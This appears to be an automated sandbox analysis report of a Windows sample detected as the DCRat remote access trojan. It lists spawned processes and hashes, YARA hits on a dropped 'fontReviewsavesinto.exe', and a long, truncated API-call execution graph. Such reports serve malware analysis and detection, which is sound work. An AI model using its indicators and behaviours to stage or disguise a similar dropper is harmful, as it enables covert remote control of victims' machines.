                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:02:12:08
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\chcp.com
                                        Wow64 process (32bit):false
                                        Commandline:chcp 65001
                                        Imagebase:0x7ff7b6d70000
                                        File size:14'848 bytes
                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:02:12:08
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\w32tm.exe
                                        Wow64 process (32bit):false
                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        Imagebase:0x7ff796c00000
                                        File size:108'032 bytes
                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:02:12:15
                                        Start date:05/11/2024
                                        Path:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\ComponentSavesinto\fontReviewsavesinto.exe"
                                        Imagebase:0xf60000
                                        File size:1'640'960 bytes
                                        MD5 hash:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:9.5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:9.4%
                                          Total number of Nodes:1507
                                          Total number of Limit Nodes:42
                                          execution_graph 25396 fa2cfb 38 API calls 4 library calls 25397 f85ef0 82 API calls 25445 f895f0 80 API calls 25446 f9fd4f 9 API calls 2 library calls 23477 fa98f0 23485 faadaf 23477->23485 23481 fa990c 23482 fa9919 23481->23482 23493 fa9920 11 API calls 23481->23493 23484 fa9904 23494 faac98 23485->23494 23488 faadee TlsAlloc 23489 faaddf 23488->23489 23501 f9fbbc 23489->23501 23491 fa98fa 23491->23484 23492 fa9869 20 API calls 2 library calls 23491->23492 23492->23481 23493->23484 23495 faacc8 23494->23495 23498 faacc4 23494->23498 23495->23488 23495->23489 23496 faace8 23496->23495 23499 faacf4 GetProcAddress 23496->23499 23498->23495 23498->23496 23508 faad34 23498->23508 23500 faad04 _unexpected 23499->23500 23500->23495 23502 f9fbc5 IsProcessorFeaturePresent 23501->23502 23503 f9fbc4 23501->23503 23505 f9fc07 23502->23505 23503->23491 23515 f9fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23505->23515 23507 f9fcea 23507->23491 23509 faad55 LoadLibraryExW 23508->23509 23510 faad4a 23508->23510 23511 faad8a 23509->23511 23512 faad72 GetLastError 23509->23512 23510->23498 23511->23510 23514 faada1 FreeLibrary 23511->23514 23512->23511 23513 faad7d LoadLibraryExW 23512->23513 23513->23511 23514->23510 23515->23507 23517 faabf0 23518 faabfb 23517->23518 23520 faac24 23518->23520 23521 faac20 23518->23521 23523 faaf0a 23518->23523 23530 faac50 DeleteCriticalSection 23520->23530 23524 faac98 _unexpected 5 API calls 23523->23524 23525 faaf31 23524->23525 23526 faaf3a 23525->23526 23527 faaf4f InitializeCriticalSectionAndSpinCount 23525->23527 23528 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23526->23528 23527->23526 23529 faaf66 23528->23529 23529->23518 23530->23521 25398 fa88f0 7 API calls ___scrt_uninitialize_crt 25448 f8f1e8 FreeLibrary 23615 f9b7e0 23616 f9b7ea __EH_prolog 23615->23616 23783 f81316 23616->23783 23619 f9b82a 23621 f9b841 23619->23621 23623 f9b838 23619->23623 23624 f9b89b 23619->23624 23620 f9bf0f 23862 f9d69e 23620->23862 23627 f9b83c 23623->23627 23640 f9b878 23623->23640 23626 f9b92e GetDlgItemTextW 23624->23626 23630 f9b8b1 23624->23630 23633 f9b96b 23626->23633 23626->23640 23627->23621 23638 f8e617 53 API calls 23627->23638 23628 f9bf38 23631 f9bf41 SendDlgItemMessageW 23628->23631 23632 f9bf52 GetDlgItem SendMessageW 23628->23632 23629 f9bf2a SendMessageW 23629->23628 23637 f8e617 53 API calls 23630->23637 23631->23632 23880 f9a64d GetCurrentDirectoryW 23632->23880 23635 f9b980 GetDlgItem 23633->23635 23636 f9b974 23633->23636 23634 f9b95f KiUserCallbackDispatcher 23634->23621 23641 f9b994 SendMessageW SendMessageW 23635->23641 23642 f9b9b7 SetFocus 23635->23642 23636->23640 23653 f9be55 23636->23653 23643 f9b8ce SetDlgItemTextW 23637->23643 23644 f9b85b 23638->23644 23640->23621 23640->23634 23641->23642 23646 f9b9c7 23642->23646 23662 f9b9e0 23642->23662 23647 f9b8d9 23643->23647 23902 f8124f SHGetMalloc 23644->23902 23645 f9bf82 GetDlgItem 23649 f9bf9f 23645->23649 23650 f9bfa5 SetWindowTextW 23645->23650 23652 f8e617 53 API calls 23646->23652 23647->23621 23656 f9b8e6 GetMessageW 23647->23656 23649->23650 23881 f9abab GetClassNameW 23650->23881 23657 f9b9d1 23652->23657 23654 f8e617 53 API calls 23653->23654 23658 f9be65 SetDlgItemTextW 23654->23658 23656->23621 23660 f9b8fd IsDialogMessageW 23656->23660 23903 f9d4d4 23657->23903 23664 f9be79 23658->23664 23660->23647 23666 f9b90c TranslateMessage DispatchMessageW 23660->23666 23667 f8e617 53 API calls 23662->23667 23663 f9c1fc SetDlgItemTextW 23663->23621 23669 f8e617 53 API calls 23664->23669 23666->23647 23668 f9ba17 23667->23668 23671 f84092 _swprintf 51 API calls 23668->23671 23705 f9be9c _wcslen 23669->23705 23670 f9bff0 23674 f9c020 23670->23674 23677 f8e617 53 API calls 23670->23677 23676 f9ba29 23671->23676 23672 f9c73f 97 API calls 23672->23670 23673 f9b9d9 23793 f8a0b1 23673->23793 23679 f9c73f 97 API calls 23674->23679 23735 f9c0d8 23674->23735 23681 f9d4d4 16 API calls 23676->23681 23682 f9c003 SetDlgItemTextW 23677->23682 23686 f9c03b 23679->23686 23680 f9c18b 23687 f9c19d 23680->23687 23688 f9c194 EnableWindow 23680->23688 23681->23673 23690 f8e617 53 API calls 23682->23690 23683 f9ba68 GetLastError 23684 f9ba73 23683->23684 23799 f9ac04 SetCurrentDirectoryW 23684->23799 23697 f9c04d 23686->23697 23725 f9c072 23686->23725 23693 f9c1ba 23687->23693 23921 f812d3 GetDlgItem EnableWindow 23687->23921 23688->23687 23689 f9beed 23692 f8e617 53 API calls 23689->23692 23694 f9c017 SetDlgItemTextW 23690->23694 23691 f9ba87 23695 f9ba9e 23691->23695 23696 f9ba90 GetLastError 23691->23696 23692->23621 23700 f9c1e1 23693->23700 23710 f9c1d9 SendMessageW 23693->23710 23694->23674 23702 f9bb11 23695->23702 23706 f9bb20 23695->23706 23711 f9baae GetTickCount 23695->23711 23696->23695 23919 f99ed5 32 API calls 23697->23919 23698 f9c0cb 23701 f9c73f 97 API calls 23698->23701 23700->23621 23712 f8e617 53 API calls 23700->23712 23701->23735 23702->23706 23707 f9bd56 23702->23707 23704 f9c1b0 23922 f812d3 GetDlgItem EnableWindow 23704->23922 23705->23689 23713 f8e617 53 API calls 23705->23713 23714 f9bcfb 23706->23714 23716 f9bb39 GetModuleFileNameW 23706->23716 23717 f9bcf1 23706->23717 23818 f812f1 GetDlgItem ShowWindow 23707->23818 23708 f9c066 23708->23725 23710->23700 23800 f84092 23711->23800 23720 f9b862 23712->23720 23721 f9bed0 23713->23721 23724 f8e617 53 API calls 23714->23724 23715 f9c169 23920 f99ed5 32 API calls 23715->23920 23913 f8f28c 82 API calls 23716->23913 23717->23640 23717->23714 23720->23621 23720->23663 23728 f84092 _swprintf 51 API calls 23721->23728 23732 f9bd05 23724->23732 23725->23698 23733 f9c73f 97 API calls 23725->23733 23726 f9bd66 23819 f812f1 GetDlgItem ShowWindow 23726->23819 23727 f9bac7 23803 f8966e 23727->23803 23728->23689 23729 f8e617 53 API calls 23729->23735 23730 f9c188 23730->23680 23731 f9bb5f 23736 f84092 _swprintf 51 API calls 23731->23736 23737 f84092 _swprintf 51 API calls 23732->23737 23738 f9c0a0 23733->23738 23735->23680 23735->23715 23735->23729 23740 f9bb81 CreateFileMappingW 23736->23740 23741 f9bd23 23737->23741 23738->23698 23742 f9c0a9 DialogBoxParamW 23738->23742 23739 f9bd70 23820 f8e617 23739->23820 23745 f9bbe3 GetCommandLineW 23740->23745 23778 f9bc60 __InternalCxxFrameHandler 23740->23778 23755 f8e617 53 API calls 23741->23755 23742->23640 23742->23698 23748 f9bbf4 23745->23748 23747 f9baed 23751 f9baff 23747->23751 23752 f9baf4 GetLastError 23747->23752 23914 f9b425 SHGetMalloc 23748->23914 23749 f9bc6b ShellExecuteExW 23773 f9bc88 23749->23773 23811 f8959a 23751->23811 23752->23751 23758 f9bd3d 23755->23758 23756 f9bd8c SetDlgItemTextW GetDlgItem 23759 f9bda9 GetWindowLongW SetWindowLongW 23756->23759 23760 f9bdc1 23756->23760 23757 f9bc10 23915 f9b425 SHGetMalloc 23757->23915 23759->23760 23825 f9c73f 23760->23825 23763 f9bc1c 23916 f9b425 SHGetMalloc 23763->23916 23765 f9c73f 97 API calls 23768 f9bddd 23765->23768 23767 f9bccb 23767->23717 23771 f9bce1 UnmapViewOfFile CloseHandle 23767->23771 23850 f9da52 23768->23850 23769 f9bc28 23917 f8f3fa 82 API calls 2 library calls 23769->23917 23771->23717 23773->23767 23776 f9bcb7 Sleep 23773->23776 23775 f9bc3f MapViewOfFile 23775->23778 23776->23767 23776->23773 23777 f9c73f 97 API calls 23781 f9be03 23777->23781 23778->23749 23779 f9be2c 23918 f812d3 GetDlgItem EnableWindow 23779->23918 23781->23779 23782 f9c73f 97 API calls 23781->23782 23782->23779 23784 f81378 23783->23784 23785 f8131f 23783->23785 23924 f8e2c1 GetWindowLongW SetWindowLongW 23784->23924 23787 f81385 23785->23787 23923 f8e2e8 62 API calls 2 library calls 23785->23923 23787->23619 23787->23620 23787->23621 23789 f81341 23789->23787 23790 f81354 GetDlgItem 23789->23790 23790->23787 23791 f81364 23790->23791 23791->23787 23792 f8136a SetWindowTextW 23791->23792 23792->23787 23794 f8a0bb 23793->23794 23795 f8a14c 23794->23795 23797 f8a175 23794->23797 23925 f8a2b2 23794->23925 23796 f8a2b2 8 API calls 23795->23796 23795->23797 23796->23797 23797->23683 23797->23684 23799->23691 23963 f84065 23800->23963 23804 f89678 23803->23804 23805 f896d5 CreateFileW 23804->23805 23806 f896c9 23804->23806 23805->23806 23807 f8971f 23806->23807 23808 f8bb03 GetCurrentDirectoryW 23806->23808 23807->23747 23809 f89704 23808->23809 23809->23807 23810 f89708 CreateFileW 23809->23810 23810->23807 23812 f895be 23811->23812 23813 f895cf 23811->23813 23812->23813 23814 f895ca 23812->23814 23815 f895d1 23812->23815 23813->23702 24042 f8974e 23814->24042 24047 f89620 23815->24047 23818->23726 23819->23739 23821 f8e627 23820->23821 24062 f8e648 23821->24062 23824 f812f1 GetDlgItem ShowWindow 23824->23756 23826 f9c749 __EH_prolog 23825->23826 23827 f9bdcf 23826->23827 24085 f9b314 23826->24085 23827->23765 23830 f9b314 ExpandEnvironmentStringsW 23840 f9c780 _wcslen _wcsrchr 23830->23840 23831 f9ca67 SetWindowTextW 23831->23840 23836 f9c855 SetFileAttributesW 23838 f9c90f GetFileAttributesW 23836->23838 23839 f9c86f __cftof _wcslen 23836->23839 23838->23840 23842 f9c921 DeleteFileW 23838->23842 23839->23838 23839->23840 24091 f8b991 51 API calls 2 library calls 23839->24091 23840->23827 23840->23830 23840->23831 23840->23836 23843 f9cc31 GetDlgItem SetWindowTextW SendMessageW 23840->23843 23845 f9cc71 SendMessageW 23840->23845 24089 f91fbb CompareStringW 23840->24089 24090 f9a64d GetCurrentDirectoryW 23840->24090 24092 f8a5d1 6 API calls 23840->24092 24093 f8a55a FindClose 23840->24093 24094 f9b48e 76 API calls 2 library calls 23840->24094 24095 fa3e3e 23840->24095 23842->23840 23847 f9c932 23842->23847 23843->23840 23844 f84092 _swprintf 51 API calls 23846 f9c952 GetFileAttributesW 23844->23846 23845->23840 23846->23847 23848 f9c967 MoveFileW 23846->23848 23847->23844 23848->23840 23849 f9c97f MoveFileExW 23848->23849 23849->23840 23851 f9da5c __EH_prolog 23850->23851 24119 f90659 23851->24119 23853 f9da8d 24123 f85b3d 23853->24123 23855 f9daab 24127 f87b0d 23855->24127 23859 f9dafe 24143 f87b9e 23859->24143 23861 f9bdee 23861->23777 23863 f9d6a8 23862->23863 24622 f9a5c6 23863->24622 23866 f9d6b5 GetWindow 23867 f9bf15 23866->23867 23873 f9d6d5 23866->23873 23867->23628 23867->23629 23868 f9d6e2 GetClassNameW 24627 f91fbb CompareStringW 23868->24627 23870 f9d76a GetWindow 23870->23867 23870->23873 23871 f9d706 GetWindowLongW 23871->23870 23872 f9d716 SendMessageW 23871->23872 23872->23870 23874 f9d72c GetObjectW 23872->23874 23873->23867 23873->23868 23873->23870 23873->23871 24628 f9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23874->24628 23876 f9d743 24629 f9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23876->24629 24630 f9a80c 8 API calls 23876->24630 23879 f9d754 SendMessageW DeleteObject 23879->23870 23880->23645 23882 f9abcc 23881->23882 23883 f9abf1 23881->23883 24633 f91fbb CompareStringW 23882->24633 23885 f9abff 23883->23885 23886 f9abf6 SHAutoComplete 23883->23886 23889 f9b093 23885->23889 23886->23885 23887 f9abdf 23887->23883 23888 f9abe3 FindWindowExW 23887->23888 23888->23883 23890 f9b09d __EH_prolog 23889->23890 23891 f813dc 84 API calls 23890->23891 23892 f9b0bf 23891->23892 24634 f81fdc 23892->24634 23895 f9b0d9 23897 f81692 86 API calls 23895->23897 23896 f9b0eb 23898 f819af 128 API calls 23896->23898 23899 f9b0e4 23897->23899 23901 f9b10d __InternalCxxFrameHandler ___std_exception_copy 23898->23901 23899->23670 23899->23672 23900 f81692 86 API calls 23900->23899 23901->23900 23902->23720 24642 f9b568 PeekMessageW 23903->24642 23906 f9d502 23910 f9d50d ShowWindow SendMessageW SendMessageW 23906->23910 23907 f9d536 SendMessageW SendMessageW 23908 f9d591 SendMessageW SendMessageW SendMessageW 23907->23908 23909 f9d572 23907->23909 23911 f9d5c4 SendMessageW 23908->23911 23912 f9d5e7 SendMessageW 23908->23912 23909->23908 23910->23907 23911->23912 23912->23673 23913->23731 23914->23757 23915->23763 23916->23769 23917->23775 23918->23636 23919->23708 23920->23730 23921->23704 23922->23693 23923->23789 23924->23787 23926 f8a2bf 23925->23926 23927 f8a2e3 23926->23927 23928 f8a2d6 CreateDirectoryW 23926->23928 23946 f8a231 23927->23946 23928->23927 23930 f8a316 23928->23930 23933 f8a325 23930->23933 23938 f8a4ed 23930->23938 23932 f8a329 GetLastError 23932->23933 23933->23794 23936 f8a2ff 23936->23932 23937 f8a303 CreateDirectoryW 23936->23937 23937->23930 23937->23932 23953 f9ec50 23938->23953 23941 f8a53d 23941->23933 23942 f8a510 23943 f8bb03 GetCurrentDirectoryW 23942->23943 23944 f8a524 23943->23944 23944->23941 23945 f8a528 SetFileAttributesW 23944->23945 23945->23941 23955 f8a243 23946->23955 23949 f8bb03 23950 f8bb10 _wcslen 23949->23950 23951 f8bbb8 GetCurrentDirectoryW 23950->23951 23952 f8bb39 _wcslen 23950->23952 23951->23952 23952->23936 23954 f8a4fa SetFileAttributesW 23953->23954 23954->23941 23954->23942 23956 f9ec50 23955->23956 23957 f8a250 GetFileAttributesW 23956->23957 23958 f8a23a 23957->23958 23959 f8a261 23957->23959 23958->23932 23958->23949 23960 f8bb03 GetCurrentDirectoryW 23959->23960 23961 f8a275 23960->23961 23961->23958 23962 f8a279 GetFileAttributesW 23961->23962 23962->23958 23964 f8407c __vswprintf_c_l 23963->23964 23967 fa5fd4 23964->23967 23970 fa4097 23967->23970 23971 fa40bf 23970->23971 23972 fa40d7 23970->23972 23987 fa91a8 20 API calls _abort 23971->23987 23972->23971 23974 fa40df 23972->23974 23989 fa4636 23974->23989 23975 fa40c4 23988 fa9087 26 API calls ___std_exception_copy 23975->23988 23979 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23981 f84086 23979->23981 23981->23727 23982 fa4167 23998 fa49e6 51 API calls 3 library calls 23982->23998 23985 fa40cf 23985->23979 23986 fa4172 23999 fa46b9 20 API calls _free 23986->23999 23987->23975 23988->23985 23990 fa40ef 23989->23990 23991 fa4653 23989->23991 23997 fa4601 20 API calls 2 library calls 23990->23997 23991->23990 24000 fa97e5 GetLastError 23991->24000 23993 fa4674 24020 fa993a 38 API calls __cftof 23993->24020 23995 fa468d 24021 fa9967 38 API calls __cftof 23995->24021 23997->23982 23998->23986 23999->23985 24001 fa97fb 24000->24001 24002 fa9801 24000->24002 24022 faae5b 11 API calls 2 library calls 24001->24022 24006 fa9850 SetLastError 24002->24006 24023 fab136 24002->24023 24006->23993 24007 fa981b 24030 fa8dcc 24007->24030 24010 fa9830 24010->24007 24012 fa9837 24010->24012 24011 fa9821 24013 fa985c SetLastError 24011->24013 24037 fa9649 20 API calls _unexpected 24012->24037 24038 fa8d24 38 API calls _abort 24013->24038 24015 fa9842 24017 fa8dcc _free 20 API calls 24015->24017 24019 fa9849 24017->24019 24019->24006 24019->24013 24020->23995 24021->23990 24022->24002 24029 fab143 _unexpected 24023->24029 24024 fab183 24040 fa91a8 20 API calls _abort 24024->24040 24025 fab16e RtlAllocateHeap 24027 fa9813 24025->24027 24025->24029 24027->24007 24036 faaeb1 11 API calls 2 library calls 24027->24036 24029->24024 24029->24025 24039 fa7a5e 7 API calls 2 library calls 24029->24039 24031 fa8dd7 RtlFreeHeap 24030->24031 24032 fa8e00 __dosmaperr 24030->24032 24031->24032 24033 fa8dec 24031->24033 24032->24011 24041 fa91a8 20 API calls _abort 24033->24041 24035 fa8df2 GetLastError 24035->24032 24036->24010 24037->24015 24039->24029 24040->24027 24041->24035 24043 f89781 24042->24043 24046 f89757 24042->24046 24043->23813 24046->24043 24053 f8a1e0 24046->24053 24048 f8962c 24047->24048 24049 f8964a 24047->24049 24048->24049 24051 f89638 CloseHandle 24048->24051 24050 f89669 24049->24050 24061 f86bd5 76 API calls 24049->24061 24050->23813 24051->24049 24054 f9ec50 24053->24054 24055 f8a1ed DeleteFileW 24054->24055 24056 f8977f 24055->24056 24057 f8a200 24055->24057 24056->23813 24058 f8bb03 GetCurrentDirectoryW 24057->24058 24059 f8a214 24058->24059 24059->24056 24060 f8a218 DeleteFileW 24059->24060 24060->24056 24061->24050 24068 f8d9b0 24062->24068 24065 f8e66b LoadStringW 24066 f8e645 SetDlgItemTextW 24065->24066 24067 f8e682 LoadStringW 24065->24067 24066->23824 24067->24066 24073 f8d8ec 24068->24073 24070 f8d9cd 24072 f8d9e2 24070->24072 24081 f8d9f0 26 API calls 24070->24081 24072->24065 24072->24066 24074 f8d904 24073->24074 24080 f8d984 _strncpy 24073->24080 24077 f8d928 24074->24077 24082 f91da7 WideCharToMultiByte 24074->24082 24076 f8d959 24084 fa6159 26 API calls 3 library calls 24076->24084 24077->24076 24083 f8e5b1 50 API calls __vsnprintf 24077->24083 24080->24070 24081->24072 24082->24077 24083->24076 24084->24080 24086 f9b31e 24085->24086 24087 f9b3f0 ExpandEnvironmentStringsW 24086->24087 24088 f9b40d 24086->24088 24087->24088 24088->23840 24089->23840 24090->23840 24091->23839 24092->23840 24093->23840 24094->23840 24096 fa8e54 24095->24096 24097 fa8e6c 24096->24097 24098 fa8e61 24096->24098 24100 fa8e74 24097->24100 24106 fa8e7d _unexpected 24097->24106 24108 fa8e06 24098->24108 24101 fa8dcc _free 20 API calls 24100->24101 24104 fa8e69 24101->24104 24102 fa8e82 24115 fa91a8 20 API calls _abort 24102->24115 24103 fa8ea7 HeapReAlloc 24103->24104 24103->24106 24104->23840 24106->24102 24106->24103 24116 fa7a5e 7 API calls 2 library calls 24106->24116 24109 fa8e44 24108->24109 24113 fa8e14 _unexpected 24108->24113 24118 fa91a8 20 API calls _abort 24109->24118 24111 fa8e2f RtlAllocateHeap 24112 fa8e42 24111->24112 24111->24113 24112->24104 24113->24109 24113->24111 24117 fa7a5e 7 API calls 2 library calls 24113->24117 24115->24104 24116->24106 24117->24113 24118->24112 24120 f90666 _wcslen 24119->24120 24147 f817e9 24120->24147 24122 f9067e 24122->23853 24124 f90659 _wcslen 24123->24124 24125 f817e9 78 API calls 24124->24125 24126 f9067e 24125->24126 24126->23855 24128 f87b17 __EH_prolog 24127->24128 24164 f8ce40 24128->24164 24130 f87b32 24170 f9eb38 24130->24170 24132 f87b5c 24179 f94a76 24132->24179 24135 f87c7d 24136 f87c87 24135->24136 24138 f87cf1 24136->24138 24211 f8a56d 24136->24211 24140 f87d50 24138->24140 24189 f88284 24138->24189 24139 f87d92 24139->23859 24140->24139 24217 f8138b 74 API calls 24140->24217 24144 f87bac 24143->24144 24146 f87bb3 24143->24146 24145 f92297 86 API calls 24144->24145 24145->24146 24148 f817ff 24147->24148 24149 f8185a __InternalCxxFrameHandler 24147->24149 24150 f81828 24148->24150 24160 f86c36 76 API calls __vswprintf_c_l 24148->24160 24149->24122 24151 f81887 24150->24151 24157 f81847 ___std_exception_copy 24150->24157 24154 fa3e3e 22 API calls 24151->24154 24153 f8181e 24161 f86ca7 75 API calls 24153->24161 24156 f8188e 24154->24156 24156->24149 24163 f86ca7 75 API calls 24156->24163 24157->24149 24162 f86ca7 75 API calls 24157->24162 24160->24153 24161->24150 24162->24149 24163->24149 24165 f8ce4a __EH_prolog 24164->24165 24166 f9eb38 8 API calls 24165->24166 24167 f8ce8d 24166->24167 24168 f9eb38 8 API calls 24167->24168 24169 f8ceb1 24168->24169 24169->24130 24171 f9eb3d ___std_exception_copy 24170->24171 24172 f9eb57 24171->24172 24174 f9eb59 24171->24174 24185 fa7a5e 7 API calls 2 library calls 24171->24185 24172->24132 24175 f9f5c9 24174->24175 24186 fa238d RaiseException 24174->24186 24187 fa238d RaiseException 24175->24187 24178 f9f5e6 24180 f94a80 __EH_prolog 24179->24180 24181 f9eb38 8 API calls 24180->24181 24182 f94a9c 24181->24182 24183 f87b8b 24182->24183 24188 f90e46 80 API calls 24182->24188 24183->24135 24185->24171 24186->24175 24187->24178 24188->24183 24190 f8828e __EH_prolog 24189->24190 24218 f813dc 24190->24218 24192 f882aa 24193 f882bb 24192->24193 24358 f89f42 24192->24358 24197 f882f2 24193->24197 24226 f81a04 24193->24226 24354 f81692 24197->24354 24199 f88389 24245 f88430 24199->24245 24202 f883e8 24250 f81f6d 24202->24250 24206 f883f3 24206->24197 24254 f83b2d 24206->24254 24266 f8848e 24206->24266 24208 f8a56d 7 API calls 24209 f882ee 24208->24209 24209->24197 24209->24199 24209->24208 24362 f8c0c5 CompareStringW _wcslen 24209->24362 24212 f8a582 24211->24212 24213 f8a5b0 24212->24213 24611 f8a69b 24212->24611 24213->24136 24215 f8a592 24215->24213 24216 f8a597 FindClose 24215->24216 24216->24213 24217->24139 24219 f813e1 __EH_prolog 24218->24219 24220 f8ce40 8 API calls 24219->24220 24221 f81419 24220->24221 24222 f9eb38 8 API calls 24221->24222 24225 f81474 __cftof 24221->24225 24223 f81461 24222->24223 24223->24225 24364 f8b505 24223->24364 24225->24192 24227 f81a0e __EH_prolog 24226->24227 24239 f81a61 24227->24239 24242 f81b9b 24227->24242 24380 f813ba 24227->24380 24230 f81bc7 24383 f8138b 74 API calls 24230->24383 24232 f83b2d 101 API calls 24235 f81c12 24232->24235 24233 f81bd4 24233->24232 24233->24242 24234 f81c5a 24238 f81c8d 24234->24238 24234->24242 24384 f8138b 74 API calls 24234->24384 24235->24234 24237 f83b2d 101 API calls 24235->24237 24237->24235 24238->24242 24243 f89e80 79 API calls 24238->24243 24239->24230 24239->24233 24239->24242 24240 f83b2d 101 API calls 24241 f81cde 24240->24241 24241->24240 24241->24242 24242->24209 24243->24241 24244 f89e80 79 API calls 24244->24239 24402 f8cf3d 24245->24402 24247 f88440 24406 f913d2 GetSystemTime SystemTimeToFileTime 24247->24406 24249 f883a3 24249->24202 24363 f91b66 72 API calls 24249->24363 24251 f81f72 __EH_prolog 24250->24251 24253 f81fa6 24251->24253 24407 f819af 24251->24407 24253->24206 24255 f83b39 24254->24255 24256 f83b3d 24254->24256 24255->24206 24265 f89e80 79 API calls 24256->24265 24257 f83b4f 24258 f83b78 24257->24258 24259 f83b6a 24257->24259 24538 f8286b 101 API calls 3 library calls 24258->24538 24260 f83baa 24259->24260 24537 f832f7 89 API calls 2 library calls 24259->24537 24260->24206 24263 f83b76 24263->24260 24539 f820d7 74 API calls 24263->24539 24265->24257 24267 f88498 __EH_prolog 24266->24267 24270 f884d5 24267->24270 24281 f88513 24267->24281 24564 f98c8d 103 API calls 24267->24564 24269 f884f5 24271 f884fa 24269->24271 24272 f8851c 24269->24272 24270->24269 24275 f8857a 24270->24275 24270->24281 24271->24281 24565 f87a0d 152 API calls 24271->24565 24272->24281 24566 f98c8d 103 API calls 24272->24566 24275->24281 24540 f85d1a 24275->24540 24277 f88605 24277->24281 24546 f88167 24277->24546 24280 f88797 24282 f8a56d 7 API calls 24280->24282 24285 f88802 24280->24285 24281->24206 24282->24285 24284 f8d051 82 API calls 24291 f8885d 24284->24291 24552 f87c0d 24285->24552 24286 f8898b 24569 f82021 74 API calls 24286->24569 24287 f88992 24288 f88a5f 24287->24288 24293 f889e1 24287->24293 24292 f88ab6 24288->24292 24305 f88a6a 24288->24305 24291->24281 24291->24284 24291->24286 24291->24287 24567 f88117 84 API calls 24291->24567 24568 f82021 74 API calls 24291->24568 24300 f88a4c 24292->24300 24572 f87fc0 97 API calls 24292->24572 24297 f8a231 3 API calls 24293->24297 24293->24300 24302 f88b14 24293->24302 24294 f89105 24299 f8959a 80 API calls 24294->24299 24295 f88ab4 24296 f8959a 80 API calls 24295->24296 24296->24281 24301 f88a19 24297->24301 24299->24281 24300->24295 24300->24302 24301->24300 24570 f892a3 97 API calls 24301->24570 24302->24294 24314 f88b82 24302->24314 24573 f898bc 24302->24573 24303 f8ab1a 8 API calls 24306 f88bd1 24303->24306 24305->24295 24571 f87db2 101 API calls 24305->24571 24309 f8ab1a 8 API calls 24306->24309 24323 f88be7 24309->24323 24312 f88b70 24577 f86e98 77 API calls 24312->24577 24314->24303 24315 f88cbc 24316 f88d18 24315->24316 24317 f88e40 24315->24317 24318 f88d8a 24316->24318 24319 f88d28 24316->24319 24320 f88e52 24317->24320 24321 f88e66 24317->24321 24340 f88d49 24317->24340 24328 f88167 19 API calls 24318->24328 24324 f88d6e 24319->24324 24332 f88d37 24319->24332 24325 f89215 123 API calls 24320->24325 24322 f93377 75 API calls 24321->24322 24326 f88e7f 24322->24326 24323->24315 24327 f88c93 24323->24327 24334 f8981a 79 API calls 24323->24334 24324->24340 24580 f877b8 111 API calls 24324->24580 24325->24340 24583 f93020 123 API calls 24326->24583 24327->24315 24578 f89a3c 82 API calls 24327->24578 24331 f88dbd 24328->24331 24336 f88df5 24331->24336 24337 f88de6 24331->24337 24331->24340 24579 f82021 74 API calls 24332->24579 24334->24327 24582 f89155 93 API calls __EH_prolog 24336->24582 24581 f87542 85 API calls 24337->24581 24342 f88f85 24340->24342 24584 f82021 74 API calls 24340->24584 24342->24294 24344 f8903e 24342->24344 24352 f89090 24342->24352 24558 f89f09 SetEndOfFile 24342->24558 24343 f8a4ed 3 API calls 24345 f890eb 24343->24345 24559 f89da2 24344->24559 24345->24294 24585 f82021 74 API calls 24345->24585 24348 f89085 24350 f89620 77 API calls 24348->24350 24350->24352 24351 f890fb 24586 f86dcb 76 API calls 24351->24586 24352->24294 24352->24343 24355 f816a4 24354->24355 24602 f8cee1 24355->24602 24359 f89f59 24358->24359 24360 f89f63 24359->24360 24610 f86d0c 78 API calls 24359->24610 24360->24193 24362->24209 24363->24202 24365 f8b50f __EH_prolog 24364->24365 24370 f8f1d0 82 API calls 24365->24370 24367 f8b521 24371 f8b61e 24367->24371 24370->24367 24372 f8b630 __cftof 24371->24372 24375 f910dc 24372->24375 24378 f9109e GetCurrentProcess GetProcessAffinityMask 24375->24378 24379 f8b597 24378->24379 24379->24225 24385 f81732 24380->24385 24382 f813d6 24382->24244 24383->24242 24384->24238 24387 f81748 24385->24387 24397 f817a0 __InternalCxxFrameHandler 24385->24397 24386 f81771 24389 f817c7 24386->24389 24394 f8178d ___std_exception_copy 24386->24394 24387->24386 24398 f86c36 76 API calls __vswprintf_c_l 24387->24398 24391 fa3e3e 22 API calls 24389->24391 24390 f81767 24399 f86ca7 75 API calls 24390->24399 24393 f817ce 24391->24393 24393->24397 24401 f86ca7 75 API calls 24393->24401 24394->24397 24400 f86ca7 75 API calls 